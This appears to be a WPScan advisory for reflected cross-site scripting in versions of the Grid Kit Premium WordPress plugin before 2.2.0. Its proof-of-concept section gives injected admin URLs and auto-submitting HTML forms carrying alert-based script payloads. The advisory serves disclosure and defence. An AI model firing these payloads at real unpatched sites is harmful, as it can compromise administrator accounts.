WordPress Plugin Vulnerabilities
Grid Kit Premium < 2.2.0 - Multiple Reflected Cross-Site Scripting
Description
The plugin does not escape some parameters as well as generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin
Proof of Concept
Make a logged in admin open one of the URL below
https://example.com/wp-admin/admin.php?page=grid-kit-product-reviews&a"><script>alert(/XSS/)</script>
https://example.com/wp-admin/admin.php?page=grid-kit-product-enquiries&"><script>alert(/XSS/)</script>
Make a logged in admin open a page containing the HTML code below
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin.php?page=grid-kit-product-reviews" method="POST">
<input type="text" name="page" value='"><img src onerror=alert(/XSS/)>'>
<input type="submit" value="submit">
</form>
</body>
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin.php?page=grid-kit-product-enquiries" method="POST">
<input type="text" name="page" value='"><img src onerror=alert(/XSS/)>'>
<input type="submit" value="submit">
</form>
</body>
Requires at least one gallery to be present
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin.php?page=grid-kit" method="POST">
<input type="text" name="page" value='"><img src onerror=alert(/XSS/)>'>
<input type="submit" value="submit">
</form>
</body>
Other vulnerable URL (when at least one item in the table):
- https://example.com/wp-admin/admin.php?page=grid-kit-product-enquiries
- https://example.com/wp-admin/admin.php?page=grid-kit-product-reviews
Affects Plugins
Fixed in 2.2.0 References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Erwan LR (WPScan)
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-07-10 (about 4 months ago)
Added
2023-07-10 (about 4 months ago)
Last Updated
2023-07-10 (about 4 months ago)
WPScan 